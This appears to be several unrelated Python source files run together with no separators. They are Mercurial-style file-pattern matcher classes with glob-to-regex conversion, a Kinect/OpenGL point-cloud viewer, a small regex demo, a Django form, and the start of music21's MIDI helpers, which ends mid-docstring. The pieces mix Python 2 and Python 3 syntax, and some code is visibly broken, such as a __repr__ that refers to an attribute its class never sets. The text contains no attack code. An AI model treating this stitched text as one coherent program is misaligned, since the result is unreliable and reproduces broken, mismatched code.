    def __init__(self, root, cwd, kindpats, ctx=None, badfn=None):
        super(patternmatcher, self).__init__(root, cwd, badfn)
        # kindpats are already normalized to be relative to repo-root.
        # Can we use tree matcher?
        rules = _kindpatstoglobs(kindpats, recursive=False)
        fallback = True
        if rules is not None:
            try:
                matcher = treematcher(root, cwd, badfn=badfn, rules=rules)
                # Replace self to 'matcher'.
                self.__dict__ = matcher.__dict__
                self.__class__ = matcher.__class__
                fallback = False
            except ValueError:
                # for example, Regex("Compiled regex exceeds size limit of 10485760 bytes.")
                pass
        if fallback:
            self._prefix = _prefix(kindpats)
            self._pats, self.matchfn = _buildmatch(ctx, kindpats, "$", root)

        self._files = _explicitfiles(kindpats)

    @propertycache
    def _dirs(self):
        return set(util.dirs(self._fileset))

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        if self._prefix and dir in self._fileset:
            return "all"
        if not self._prefix:
            return True
        return (
            dir in self._fileset
            or dir in self._dirs
            or any(parentdir in self._fileset for parentdir in util.finddirs(dir))
        )

    def prefix(self):
        return self._prefix

    def __repr__(self):
        return "<patternmatcher patterns=%r>" % self._pats


class includematcher(basematcher):
    def __init__(self, root, cwd, kindpats, ctx=None, badfn=None):
        super(includematcher, self).__init__(root, cwd, badfn)

        # Can we use tree matcher?
        rules = _kindpatstoglobs(kindpats, recursive=True)
        fallback = True
        if rules is not None:
            try:
                matcher = treematcher(root, cwd, badfn=badfn, rules=rules)
                # Replace self to 'matcher'.
                self.__dict__ = matcher.__dict__
                self.__class__ = matcher.__class__
                fallback = False
            except ValueError:
                # for example, Regex("Compiled regex exceeds size limit of 10485760 bytes.")
                pass
        if fallback:
            self._pats, self.matchfn = _buildmatch(ctx, kindpats, "(?:/|$)", root)
            # prefix is True if all patterns are recursive, so certain fast paths
            # can be enabled. Unfortunately, it's too easy to break it (ex. by
            # using "glob:*.c", "re:...", etc).
            self._prefix = _prefix(kindpats)
            roots, dirs = _rootsanddirs(kindpats)
            # roots are directories which are recursively included.
            # If self._prefix is True, then _roots can have a fast path for
            # visitdir to return "all", marking things included unconditionally.
            # If self._prefix is False, then that optimization is unsound because
            # "roots" might contain entries that is not recursive (ex. roots will
            # include "foo/bar" for pattern "glob:foo/bar/*.c").
            self._roots = set(roots)
            # dirs are directories which are non-recursively included.
            # That is, files under that directory are included. But not
            # subdirectories.
            self._dirs = set(dirs)
            # Try to use a more efficient visitdir implementation
            visitdir = _buildvisitdir(kindpats)
            if visitdir:
                self.visitdir = visitdir

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        if self._prefix and dir in self._roots:
            return "all"
        return (
            dir in self._roots
            or dir in self._dirs
            or any(parentdir in self._roots for parentdir in util.finddirs(dir))
        )

    def __repr__(self):
        return "<includematcher includes=%r>" % self._pats


class exactmatcher(basematcher):
    """Matches the input files exactly. They are interpreted as paths, not
    patterns (so no kind-prefixes).
    """

    def __init__(self, root, cwd, files, badfn=None):
        super(exactmatcher, self).__init__(root, cwd, badfn)

        if isinstance(files, list):
            self._files = files
        else:
            self._files = list(files)

    matchfn = basematcher.exact

    @propertycache
    def _dirs(self):
        return set(util.dirs(self._fileset))

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        return dir in self._dirs

    def isexact(self):
        return True

    def __repr__(self):
        return "<exactmatcher files=%r>" % self._files


class differencematcher(basematcher):
    """Composes two matchers by matching if the first matches and the second
    does not. Well, almost... If the user provides a pattern like "-X foo foo",
    Mercurial actually does match "foo" against that. That's because exact
    matches are treated specially. So, since this differencematcher is used for
    excludes, it needs to special-case exact matching.

    The second matcher's non-matching-attributes (root, cwd, bad, traversedir)
    are ignored.

    TODO: If we want to keep the behavior described above for exact matches, we
    should consider instead treating the above case something like this:
    union(exact(foo), difference(pattern(foo), include(foo)))
    """

    def __init__(self, m1, m2):
        super(differencematcher, self).__init__(m1._root, m1._cwd)
        self._m1 = m1
        self._m2 = m2
        self.bad = m1.bad
        self.traversedir = m1.traversedir

    def matchfn(self, f):
        return self._m1(f) and (not self._m2(f) or self._m1.exact(f))

    @propertycache
    def _files(self):
        if self.isexact():
            return [f for f in self._m1.files() if self(f)]
        # If m1 is not an exact matcher, we can't easily figure out the set of
        # files, because its files() are not always files. For example, if
        # m1 is "path:dir" and m2 is "rootfileins:.", we don't
        # want to remove "dir" from the set even though it would match m2,
        # because the "dir" in m1 may not be a file.
        return self._m1.files()

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        if not self._m2.visitdir(dir):
            return self._m1.visitdir(dir)

        if self._m2.visitdir(dir) == "all":
            # There's a bug here: If m1 matches file 'dir/file' and m2 excludes
            # 'dir' (recursively), we should still visit 'dir' due to the
            # exception we have for exact matches.
            return False
        return bool(self._m1.visitdir(dir))

    def isexact(self):
        return self._m1.isexact()

    def __repr__(self):
        return "<differencematcher m1=%r, m2=%r>" % (self._m1, self._m2)


def intersectmatchers(m1, m2):
    """Composes two matchers by matching if both of them match.

    The second matcher's non-matching-attributes (root, cwd, bad, traversedir)
    are ignored.
    """
    if m1 is None or m2 is None:
        return m1 or m2
    if m1.always():
        m = copy.copy(m2)
        # TODO: Consider encapsulating these things in a class so there's only
        # one thing to copy from m1.
        m.bad = m1.bad
        m.traversedir = m1.traversedir
        m.abs = m1.abs
        m.rel = m1.rel
        m._relativeuipath |= m1._relativeuipath
        return m
    if m2.always():
        m = copy.copy(m1)
        m._relativeuipath |= m2._relativeuipath
        return m
    return intersectionmatcher(m1, m2)


class intersectionmatcher(basematcher):
    def __init__(self, m1, m2):
        super(intersectionmatcher, self).__init__(m1._root, m1._cwd)
        self._m1 = m1
        self._m2 = m2
        self.bad = m1.bad
        self.traversedir = m1.traversedir

    @propertycache
    def _files(self):
        if self.isexact():
            m1, m2 = self._m1, self._m2
            if not m1.isexact():
                m1, m2 = m2, m1
            return [f for f in m1.files() if m2(f)]
        # It neither m1 nor m2 is an exact matcher, we can't easily intersect
        # the set of files, because their files() are not always files. For
        # example, if intersecting a matcher "-I glob:foo.txt" with matcher of
        # "path:dir2", we don't want to remove "dir2" from the set.
        return self._m1.files() + self._m2.files()

    def matchfn(self, f):
        return self._m1(f) and self._m2(f)

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        visit1 = self._m1.visitdir(dir)
        if visit1 == "all":
            return self._m2.visitdir(dir)
        # bool() because visit1=True + visit2='all' should not be 'all'
        return bool(visit1 and self._m2.visitdir(dir))

    def always(self):
        return self._m1.always() and self._m2.always()

    def isexact(self):
        return self._m1.isexact() or self._m2.isexact()

    def __repr__(self):
        return "<intersectionmatcher m1=%r, m2=%r>" % (self._m1, self._m2)


class subdirmatcher(basematcher):
    """Adapt a matcher to work on a subdirectory only.

    The paths are remapped to remove/insert the path as needed:

    >>> from . import pycompat
    >>> m1 = match(b'root', b'', [b'a.txt', b'sub/b.txt'])
    >>> m2 = subdirmatcher(b'sub', m1)
    >>> bool(m2(b'a.txt'))
    False
    >>> bool(m2(b'b.txt'))
    True
    >>> bool(m2.matchfn(b'a.txt'))
    False
    >>> bool(m2.matchfn(b'b.txt'))
    True
    >>> m2.files()
    ['b.txt']
    >>> m2.exact(b'b.txt')
    True
    >>> util.pconvert(m2.rel(b'b.txt'))
    'sub/b.txt'
    >>> def bad(f, msg):
    ...     print(b"%s: %s" % (f, msg))
    >>> m1.bad = bad
    >>> m2.bad(b'x.txt', b'No such file')
    sub/x.txt: No such file
    >>> m2.abs(b'c.txt')
    'sub/c.txt'
    """

    def __init__(self, path, matcher):
        super(subdirmatcher, self).__init__(matcher._root, matcher._cwd)
        self._path = path
        self._matcher = matcher
        self._always = matcher.always()

        self._files = [
            f[len(path) + 1 :] for f in matcher._files if f.startswith(path + "/")
        ]

        # If the parent repo had a path to this subrepo and the matcher is
        # a prefix matcher, this submatcher always matches.
        if matcher.prefix():
            self._always = any(f == path for f in matcher._files)

    def bad(self, f, msg):
        self._matcher.bad(self._path + "/" + f, msg)

    def abs(self, f):
        return self._matcher.abs(self._path + "/" + f)

    def rel(self, f):
        return self._matcher.rel(self._path + "/" + f)

    def uipath(self, f):
        return self._matcher.uipath(self._path + "/" + f)

    def matchfn(self, f):
        # Some information is lost in the superclass's constructor, so we
        # can not accurately create the matching function for the subdirectory
        # from the inputs. Instead, we override matchfn() and visitdir() to
        # call the original matcher with the subdirectory path prepended.
        return self._matcher.matchfn(self._path + "/" + f)

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        if dir == "":
            dir = self._path
        else:
            dir = self._path + "/" + dir
        return self._matcher.visitdir(dir)

    def always(self):
        return self._always

    def prefix(self):
        return self._matcher.prefix() and not self._always

    def __repr__(self):
        return "<subdirmatcher path=%r, matcher=%r>" % (self._path, self._matcher)


class unionmatcher(basematcher):
    """A matcher that is the union of several matchers.

    The non-matching-attributes (root, cwd, bad, traversedir) are
    taken from the first matcher.
    """

    def __init__(self, matchers):
        m1 = matchers[0]
        super(unionmatcher, self).__init__(m1._root, m1._cwd)
        self.traversedir = m1.traversedir
        self._matchers = matchers

    def matchfn(self, f):
        for match in self._matchers:
            if match(f):
                return True
        return False

    def visitdir(self, dir):
        r = False
        for m in self._matchers:
            v = m.visitdir(dir)
            if v == "all":
                return v
            r |= v
        return r

    def __repr__(self):
        return "<unionmatcher matchers=%r>" % self._matchers


class xormatcher(basematcher):
    """A matcher that is the xor of two matchers i.e. match returns true if there's at least
    one false and one true.

    The non-matching-attributes (root, cwd, bad, traversedir) are
    taken from the first matcher.
    """

    def __init__(self, m1, m2):
        super(xormatcher, self).__init__(m1._root, m1._cwd)
        self.traversedir = m1.traversedir
        self.m1 = m1
        self.m2 = m2

    def matchfn(self, f):
        return bool(self.m1(f)) ^ bool(self.m2(f))

    def visitdir(self, dir):
        m1dir = self.m1.visitdir(dir)
        m2dir = self.m2.visitdir(dir)

        # if both matchers return "all" then we know for sure we don't need
        # to visit this directory. Same if all matchers return False. In all
        # other case we have to visit a directory.
        if m1dir == "all" and m2dir == "all":
            return False
        if not m1dir and not m2dir:
            return False
        return True

    def __repr__(self):
        return "<xormatcher matchers=%r>" % self._matchers


class recursivematcher(basematcher):
    """Make matchers recursive. If "a/b/c" matches, match "a/b/c/**".

    It is intended to be used by hgignore only. Other matchers would want to
    fix "visitdir" and "matchfn" to take parent directories into consideration.
    """

    def __init__(self, matcher):
        self._matcher = matcher

    def matchfn(self, f):
        match = self._matcher
        return match(f) or any(map(match, util.dirs((f,))))

    def visitdir(self, dir):
        if self(dir):
            return "all"
        return self._matcher.visitdir(dir)

    def __repr__(self):
        return "<recursivematcher %r>" % self._matcher


def patkind(pattern, default=None):
    """If pattern is 'kind:pat' with a known kind, return kind."""
    return _patsplit(pattern, default)[0]


def _patsplit(pattern, default):
    """Split a string into the optional pattern kind prefix and the actual
    pattern."""
    if ":" in pattern:
        kind, pat = pattern.split(":", 1)
        if kind in allpatternkinds:
            return kind, pat
    return default, pattern


def _globre(pat):
    r"""Convert an extended glob string to a regexp string.

    >>> from . import pycompat
    >>> def bprint(s):
    ...     print(s)
    >>> bprint(_globre(br'?'))
    .
    >>> bprint(_globre(br'*'))
    [^/]*
    >>> bprint(_globre(br'**'))
    .*
    >>> bprint(_globre(br'**/a'))
    (?:.*/)?a
    >>> bprint(_globre(br'a/**/b'))
    a/(?:.*/)?b
    >>> bprint(_globre(br'[a*?!^][^b][!c]'))
    [a*?!^][\^b][^c]
    >>> bprint(_globre(br'{a,b}'))
    (?:a|b)
    >>> bprint(_globre(br'.\*\?'))
    \.\*\?
    """
    i, n = 0, len(pat)
    res = ""
    group = 0
    escape = util.re.escape

    def peek():
        return i < n and pat[i : i + 1]

    while i < n:
        c = pat[i : i + 1]
        i += 1
        if c not in "*?[{},\\":
            res += escape(c)
        elif c == "*":
            if peek() == "*":
                i += 1
                if peek() == "/":
                    i += 1
                    res += "(?:.*/)?"
                else:
                    res += ".*"
            else:
                res += "[^/]*"
        elif c == "?":
            res += "."
        elif c == "[":
            j = i
            if j < n and pat[j : j + 1] in "!]":
                j += 1
            while j < n and pat[j : j + 1] != "]":
                j += 1
            if j >= n:
                res += "\\["
            else:
                stuff = pat[i:j].replace("\\", "\\\\")
                i = j + 1
                if stuff[0:1] == "!":
                    stuff = "^" + stuff[1:]
                elif stuff[0:1] == "^":
                    stuff = "\\" + stuff
                res = "%s[%s]" % (res, stuff)
        elif c == "{":
            group += 1
            res += "(?:"
        elif c == "}" and group:
            res += ")"
            group -= 1
        elif c == "," and group:
            res += "|"
        elif c == "\\":
            p = peek()
            if p:
                i += 1
                res += escape(p)
            else:
                res += escape(c)
        else:
            res += escape(c)
    return res


def _regex(kind, pat, globsuffix):
    """Convert a (normalized) pattern of any kind into a regular expression.
    globsuffix is appended to the regexp of globs."""
    if not pat and kind in ("glob", "relpath"):
        return ""
    if kind == "re":
        return pat
    if kind in ("path", "relpath"):
        if pat == ".":
            return ""
        return util.re.escape(pat) + "(?:/|$)"
    if kind == "rootfilesin":
        if pat == ".":
            escaped = ""
        else:
            # Pattern is a directory name.
            escaped = util.re.escape(pat) + "/"
        # Anything after the pattern must be a non-directory.
        return escaped + "[^/]+$"
    if kind == "relglob":
        return "(?:|.*/)" + _globre(pat) + globsuffix
    if kind == "relre":
        if pat.startswith("^"):
            return pat
        return ".*" + pat
    return _globre(pat) + globsuffix


def _buildmatch(ctx, kindpats, globsuffix, root):
    """Return regexp string and a matcher function for kindpats.
    globsuffix is appended to the regexp of globs."""
    matchfuncs = []

    subincludes, kindpats = _expandsubinclude(kindpats, root)
    if subincludes:
        submatchers = {}

        def matchsubinclude(f):
            for prefix, matcherargs in subincludes:
                if f.startswith(prefix):
                    mf = submatchers.get(prefix)
                    if mf is None:
                        mf = match(*matcherargs)
                        submatchers[prefix] = mf

                    if mf(f[len(prefix) :]):
                        return True
            return False

        matchfuncs.append(matchsubinclude)

    fset, kindpats = _expandsets(kindpats, ctx)
    if fset:
        matchfuncs.append(fset.__contains__)

    regex = ""
    if kindpats:
        regex, mf = _buildregexmatch(kindpats, globsuffix)
        matchfuncs.append(mf)

    if len(matchfuncs) == 1:
        return regex, matchfuncs[0]
    else:
        return regex, lambda f: any(mf(f) for mf in matchfuncs)


def _buildregexmatch(kindpats, globsuffix):
    """Build a match function from a list of kinds and kindpats,
    return regexp string and a matcher function."""
    try:
        regex = "(?:%s)" % "|".join(
            [_regex(k, p, globsuffix) for (k, p, s) in kindpats]
        )
        if len(regex) > 20000:
            raise OverflowError
        return regex, _rematcher(regex)
    except OverflowError:
        # We're using a Python with a tiny regex engine and we
        # made it explode, so we'll divide the pattern list in two
        # until it works
        l = len(kindpats)
        if l < 2:
            raise
        regexa, a = _buildregexmatch(kindpats[: l // 2], globsuffix)
        regexb, b = _buildregexmatch(kindpats[l // 2 :], globsuffix)
        return regex, lambda s: a(s) or b(s)
    except re.error:
        for k, p, s in kindpats:
            try:
                _rematcher("(?:%s)" % _regex(k, p, globsuffix))
            except re.error:
                if s:
                    raise error.Abort(_("%s: invalid pattern (%s): %s") % (s, k, p))
                else:
                    raise error.Abort(_("invalid pattern (%s): %s") % (k, p))
        raise error.Abort(_("invalid pattern"))


def _patternrootsanddirs(kindpats):
    """Returns roots and directories corresponding to each pattern.

    This calculates the roots and directories exactly matching the patterns and
    returns a tuple of (roots, dirs) for each. It does not return other
    directories which may also need to be considered, like the parent
    directories.
    """
    r = []
    d = []
    for kind, pat, source in kindpats:
        if kind == "glob":  # find the non-glob prefix
            root = []
            for p in pat.split("/"):
                if "[" in p or "{" in p or "*" in p or "?" in p:
                    break
                root.append(p)
            r.append("/".join(root))
        elif kind in ("relpath", "path"):
            if pat == ".":
                pat = ""
            r.append(pat)
        elif kind in ("rootfilesin",):
            if pat == ".":
                pat = ""
            d.append(pat)
        else:  # relglob, re, relre
            r.append("")
    return r, d


def _roots(kindpats):
    """Returns root directories to match recursively from the given patterns."""
    roots, dirs = _patternrootsanddirs(kindpats)
    return roots


def _rootsanddirs(kindpats):
    """Returns roots and exact directories from patterns.

    roots are directories to match recursively, whereas exact directories should
    be matched non-recursively. The returned (roots, dirs) tuple will also
    include directories that need to be implicitly considered as either, such as
    parent directories.

    >>> _rootsanddirs(
    ...     [(b'glob', b'g/h/*', b''), (b'glob', b'g/h', b''),
    ...      (b'glob', b'g*', b'')])
    (['g/h', 'g/h', ''], ['', 'g'])
    >>> _rootsanddirs(
    ...     [(b'rootfilesin', b'g/h', b''), (b'rootfilesin', b'', b'')])
    ([], ['g/h', '', '', 'g'])
    >>> _rootsanddirs(
    ...     [(b'relpath', b'r', b''), (b'path', b'p/p', b''),
    ...      (b'path', b'', b'')])
    (['r', 'p/p', ''], ['', 'p'])
    >>> _rootsanddirs(
    ...     [(b'relglob', b'rg*', b''), (b're', b're/', b''),
    ...      (b'relre', b'rr', b'')])
    (['', '', ''], [''])
    """
    r, d = _patternrootsanddirs(kindpats)

    # Append the parents as non-recursive/exact directories, since they must be
    # scanned to get to either the roots or the other exact directories.
    d.extend(sorted(util.dirs(d)))
    d.extend(sorted(util.dirs(r)))

    return r, d


def _explicitfiles(kindpats):
    """Returns the potential explicit filenames from the patterns.

    >>> _explicitfiles([(b'path', b'foo/bar', b'')])
    ['foo/bar']
    >>> _explicitfiles([(b'rootfilesin', b'foo/bar', b'')])
    []
    """
    # Keep only the pattern kinds where one can specify filenames (vs only
    # directory names).
    filable = [kp for kp in kindpats if kp[0] not in ("rootfilesin",)]
    return _roots(filable)


def _prefix(kindpats):
    """Whether all the patterns match a prefix (i.e. recursively)"""
    for kind, pat, source in kindpats:
        if kind not in ("path", "relpath"):
            return False
    return True


_commentre = None


def readpatternfile(filepath, warn, sourceinfo=False):
    """parse a pattern file, returning a list of
    patterns. These patterns should be given to compile()
    to be validated and converted into a match function.

    trailing white space is dropped.
    the escape character is backslash.
    comments start with #.
    empty lines are skipped.

    lines can be of the following formats:

    syntax: regexp # defaults following lines to non-rooted regexps
    syntax: glob   # defaults following lines to non-rooted globs
    re:pattern     # non-rooted regular expression
    glob:pattern   # non-rooted glob
    pattern        # pattern of the current default type

    if sourceinfo is set, returns a list of tuples:
    (pattern, lineno, originalline). This is useful to debug ignore patterns.
    """

    syntaxes = {
        "re": "relre:",
        "regexp": "relre:",
        "glob": "relglob:",
        "include": "include",
        "subinclude": "subinclude",
    }
    syntax = "relre:"
    patterns = []

    fp = open(filepath, "rb")
    for lineno, line in enumerate(util.iterfile(fp), start=1):
        if "#" in line:
            global _commentre
            if not _commentre:
                _commentre = util.re.compile(br"((?:^|[^\\])(?:\\\\)*)#.*")
            # remove comments prefixed by an even number of escapes
            m = _commentre.search(line)
            if m:
                line = line[: m.end(1)]
            # fixup properly escaped comments that survived the above
            line = line.replace("\\#", "#")
        line = line.rstrip()
        if not line:
            continue

        if line.startswith("syntax:"):
            s = line[7:].strip()
            try:
                syntax = syntaxes[s]
            except KeyError:
                if warn:
                    warn(_("%s: ignoring invalid syntax '%s'\n") % (filepath, s))
            continue

        linesyntax = syntax
        for s, rels in pycompat.iteritems(syntaxes):
            if line.startswith(rels):
                linesyntax = rels
                line = line[len(rels) :]
                break
            elif line.startswith(s + ":"):
                linesyntax = rels
                line = line[len(s) + 1 :]
                break
        if sourceinfo:
            patterns.append((linesyntax + line, lineno, line))
        else:
            patterns.append(linesyntax + line)
    fp.close()
    return patterns


_usetreematcher = True


def init(ui):
    global _usetreematcher
    _usetreematcher = ui.configbool("experimental", "treematcher")

import numpy as np
from OpenGL.GL import *
from OpenGL.GLU import *
import time
import freenect

import calibkinect
import pykinectwindow as wxwindow



# I probably need more help with these!
try: 
  TEXTURE_TARGET = GL_TEXTURE_RECTANGLE
except:
  TEXTURE_TARGET = GL_TEXTURE_RECTANGLE_ARB


if not 'win' in globals():
  win = wxwindow.Window(size=(640, 480))

def refresh():

  win.Refresh()
  print type(win)

if not 'rotangles' in globals(): rotangles = [0,0]
if not 'zoomdist' in globals(): zoomdist = 1
if not 'projpts' in globals(): projpts = (None, None)
if not 'rgb' in globals(): rgb = None

def create_texture():
  global rgbtex
  rgbtex = glGenTextures(1)
  glBindTexture(TEXTURE_TARGET, rgbtex)
  glTexImage2D(TEXTURE_TARGET,0,GL_RGB,640,480,0,GL_RGB,GL_UNSIGNED_BYTE,None)


if not '_mpos' in globals(): _mpos = None
@win.eventx
def EVT_LEFT_DOWN(event):
  global _mpos
  _mpos = event.Position
  
@win.eventx
def EVT_LEFT_UP(event):
  global _mpos
  _mpos = None
  
@win.eventx
def EVT_MOTION(event):
  global _mpos
  if event.LeftIsDown():
    if _mpos:
      (x,y),(mx,my) = event.Position,_mpos
      rotangles[0] += y-my
      rotangles[1] += x-mx
      refresh()    
    _mpos = event.Position


@win.eventx
def EVT_MOUSEWHEEL(event):
  global zoomdist
  dy = event.WheelRotation
  zoomdist *= np.power(0.95, -dy)
  refresh()
  

clearcolor = [0,0,0,0]
@win.event
def on_draw():  
  if not 'rgbtex' in globals():
    create_texture()

  xyz, uv = projpts
  if xyz is None: return

  if not rgb is None:
    rgb_ = (rgb.astype(np.float32) * 4 + 70).clip(0,255).astype(np.uint8)
    glBindTexture(TEXTURE_TARGET, rgbtex)
    glTexSubImage2D(TEXTURE_TARGET, 0, 0, 0, 640, 480, GL_RGB, GL_UNSIGNED_BYTE, rgb_);

  glClearColor(*clearcolor)
  glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
  glEnable(GL_DEPTH_TEST)

  # flush that stack in case it's broken from earlier
  glPushMatrix()

  glMatrixMode(GL_PROJECTION)
  glLoadIdentity()
  gluPerspective(60, 4/3., 0.3, 200)

  glMatrixMode(GL_MODELVIEW)
  glLoadIdentity()

  def mouse_rotate(xAngle, yAngle, zAngle):
    glRotatef(xAngle, 1.0, 0.0, 0.0);
    glRotatef(yAngle, 0.0, 1.0, 0.0);
    glRotatef(zAngle, 0.0, 0.0, 1.0);
  glScale(zoomdist,zoomdist,1)
  glTranslate(0, 0,-3.5)
  mouse_rotate(rotangles[0], rotangles[1], 0);
  glTranslate(0,0,1.5)
  #glTranslate(0, 0,-1)

  # Draw some axes
  if 0:
    glBegin(GL_LINES)
    glColor3f(1,0,0); glVertex3f(0,0,0); glVertex3f(1,0,0)
    glColor3f(0,1,0); glVertex3f(0,0,0); glVertex3f(0,1,0)
    glColor3f(0,0,1); glVertex3f(0,0,0); glVertex3f(0,0,1)
    glEnd()

  # We can either project the points ourselves, or embed it in the opengl matrix
  if 0:
    dec = 4
    v,u = mgrid[:480,:640].astype(np.uint16)
    points = np.vstack((u[::dec,::dec].flatten(),
                        v[::dec,::dec].flatten(),
                        depth[::dec,::dec].flatten())).transpose()
    points = points[points[:,2]<2047,:]
    
    glMatrixMode(GL_TEXTURE)
    glLoadIdentity()
    glMultMatrixf(calibkinect.uv_matrix().transpose())
    glMultMatrixf(calibkinect.xyz_matrix().transpose())
    glTexCoordPointers(np.array(points))
    
    glMatrixMode(GL_MODELVIEW)
    glPushMatrix()
    glMultMatrixf(calibkinect.xyz_matrix().transpose())
    glVertexPointers(np.array(points))
  else:
    glMatrixMode(GL_TEXTURE)
    glLoadIdentity()
    glMatrixMode(GL_MODELVIEW)
    glPushMatrix()
    glVertexPointerf(xyz)
    glTexCoordPointerf(uv)

  # Draw the points
  glPointSize(2)
  glEnableClientState(GL_VERTEX_ARRAY)
  glEnableClientState(GL_TEXTURE_COORD_ARRAY)
  glEnable(TEXTURE_TARGET)
  glColor3f(1,1,1)
  glDrawElementsui(GL_POINTS, np.array(range(xyz.shape[0])))
  glDisableClientState(GL_VERTEX_ARRAY)
  glDisableClientState(GL_TEXTURE_COORD_ARRAY)
  glDisable(TEXTURE_TARGET)
  glPopMatrix()

  #
  if 0:
      inds = np.nonzero(xyz[:,2]>-0.55)
      glPointSize(10)
      glColor3f(0,1,1)
      glEnableClientState(GL_VERTEX_ARRAY)
      glDrawElementsui(GL_POINTS, np.array(inds))
      glDisableClientState(GL_VERTEX_ARRAY)

  if 0:
      # Draw only the points in the near plane
      glBlendFunc(GL_SRC_ALPHA,GL_ONE_MINUS_SRC_ALPHA)
      glEnable(GL_BLEND)
      glColor(0.9,0.9,1.0,0.8)
      glPushMatrix()
      glTranslate(0,0,-0.55)
      glScale(0.6,0.6,1)
      glBegin(GL_QUADS)
      glVertex3f(-1,-1,0); glVertex3f( 1,-1,0);
      glVertex3f( 1, 1,0); glVertex3f(-1, 1,0);
      glEnd()
      glPopMatrix()
      glDisable(GL_BLEND)

  glPopMatrix()


# A silly loop that shows you can busy the ipython thread while opengl runs
def playcolors():
  while 1:
    global clearcolor
    clearcolor = [np.random.random(),0,0,0]
    time.sleep(0.1)
    refresh()

# Update the point cloud from the shell or from a background thread!

def update(dt=0):
  global projpts, rgb, depth
  depth,_ = freenect.sync_get_depth()
  rgb,_ = freenect.sync_get_video()
  q = depth
  X,Y = np.meshgrid(range(640),range(480))
  # YOU CAN CHANGE THIS AND RERUN THE PROGRAM!
  # Point cloud downsampling
  d = 4
  projpts = calibkinect.depth2xyzuv(q[::d,::d],X[::d,::d],Y[::d,::d])
  refresh()
  
def update_join():
  update_on()
  try:
    _thread.join()
  except:
    update_off()
  
def update_on():
  global _updating
  if not '_updating' in globals(): _updating = False
  if _updating: return
  
  _updating = True
  from threading import Thread
  global _thread
  def _run():
    while _updating:
      update()
  _thread = Thread(target=_run)
  _thread.start()
  
def update_off():
  global _updating
  _updating = False
  
  
# Get frames in a loop and display with opencv
def loopcv():
  import cv
  while 1:
    cv.ShowImage('hi',get_depth().astype(np.uint8))
    cv.WaitKey(10)


update() 
#update_on()





import re
p = re.compile(r'(\w+) (\w+)(?P<sign>.*)', re.DOTALL)
 
print re.DOTALL
print "p.pattern:", p.pattern
print "p.flags:", p.flags
print "p.groups:", p.groups
print "p.groupindex:", p.groupindex



from models import Connection
from django import forms

class ConnectionForm(forms.ModelForm):
    class Meta:
        model = Connection
        exclude = ('d_object_id',)

# -*- coding: utf-8 -*-
# pylint: disable=too-many-lines,too-complex,too-many-branches
# pylint: disable=too-many-statements,arguments-differ
# needs refactoring, but I don't have the energy for anything
# more than a superficial cleanup.
#-------------------------------------------------------------------------------
# Name:         midi/__init__.py
# Purpose:      Access to MIDI library / music21 classes for dealing with midi data
#
# Authors:      Christopher Ariza
#               Michael Scott Cuthbert
#               (Will Ware -- see docs)
#
# Copyright:    Copyright © 2011-2013 Michael Scott Cuthbert and the music21 Project
#               Some parts of this module are in the Public Domain, see details.
# License:      LGPL or BSD, see license.txt
#-------------------------------------------------------------------------------
'''
Objects and tools for processing MIDI data.  Converts from MIDI files to
:class:`~MidiEvent`, :class:`~MidiTrack`, and
:class:`~MidiFile` objects, and vice-versa.
This module uses routines from Will Ware's public domain midi.py library from 2001
see http://groups.google.com/group/alt.sources/msg/0c5fc523e050c35e
'''
import struct
import sys
import unicodedata # @UnresolvedImport

# good midi reference:
# http://www.sonicspot.com/guide/midifiles.html

def is_num(usr_data):
    '''
    check if usr_data is a number (float, int, long, Decimal),
    return boolean

    unlike `isinstance(usr_data, Number)` does not return True for `True, False`.

    Does not use `isinstance(usr_data, Number)` which is 6 times slower
    than calling this function (except in the case of Fraction, when
    it's 6 times faster, but that's rarer)

    Runs by adding 0 to the "number" -- so anything that implements
    add to a scalar works

    >>> is_num(3.0)
    True
    >>> is_num(3)
    True
    >>> is_num('three')
    False
    >>> is_num([2, 3, 4])
    False

    True and False are NOT numbers:

    >>> is_num(True)
    False
    >>> is_num(False)
    False
    >>> is_num(None)
    False

    :rtype: bool
    '''
    try:
        dummy = usr_data + 0
        # pylint: disable=simplifiable-if-statement
        if usr_data is not True and usr_data is not False:
            return True
        else:
            return False
    except Exception: # pylint: disable=broad-except
        return False

# pylint: disable=missing-docstring
#-------------------------------------------------------------------------------
class EnumerationException(Exception):
    pass

class MidiException(Exception):
    pass

#-------------------------------------------------------------------------------

def char_to_binary(char):
    '''
    Convert a char into its binary representation. Useful for debugging.

    >>> char_to_binary('a')
    '01100001'
    '''
    ascii_value = ord(char)
    binary_digits = []
    while ascii_value > 0:
        if (ascii_value & 1) == 1:
            binary_digits.append("1")
        else:
            binary_digits.append("0")
        ascii_value = ascii_value >> 1

    binary_digits.reverse()
    binary = ''.join(binary_digits)
    zerofix = (8 - len(binary)) * '0'
    return zerofix + binary


def ints_to_hex_string(int_list):
    '''
    Convert a list of integers into a hex string, suitable for testing MIDI encoding.


    >>> # note on, middle c, 120 velocity
    >>> ints_to_hex_string([144, 60, 120])
    b'\\x90<x'
    '''
    # note off are 128 to 143
    # note on messages are decimal 144 to 159
    post = b''
    for i in int_list:
        # B is an unsigned char
        # this forces values between 0 and 255
        # the same as chr(int)
        post += struct.pack(">B", i)
    return post

def get_number(midi_str, length):
    '''
    Return the value of a string byte or bytes if length > 1
    from an 8-bit string or (PY3) bytes object

    Then, return the remaining string or bytes object
    The `length` is the number of chars to read.
    This will sum a length greater than 1 if desired.
    Note that MIDI uses big-endian for everything.
    This is the inverse of Python's chr() function.

    >>> get_number('test', 0)
    (0, 'test')
    >>> get_number('test', 2)
    (29797, 'st')
    >>> get_number('test', 4)
    (1952805748, '')
    '''
    summation = 0
    if not is_num(midi_str):
        for i in range(length):
            midi_str_or_num = midi_str[i]
            if is_num(midi_str_or_num):
                summation = (summation << 8) + midi_str_or_num
            else:
                summation = (summation << 8) + ord(midi_str_or_num)
        return summation, midi_str[length:]
    else:
        mid_num = midi_str
        summation = mid_num - ((mid_num >> (8*length)) << (8*length))
        big_bytes = mid_num - summation
        return summation, big_bytes

def get_variable_length_number(midi_str):
    r'''
    Given a string of data, strip off a the first character, or all high-byte characters
    terminating with one whose ord() function is < 0x80.  Thus a variable number of bytes
    might be read.

    After finding the appropriate termination,
    return the remaining string.
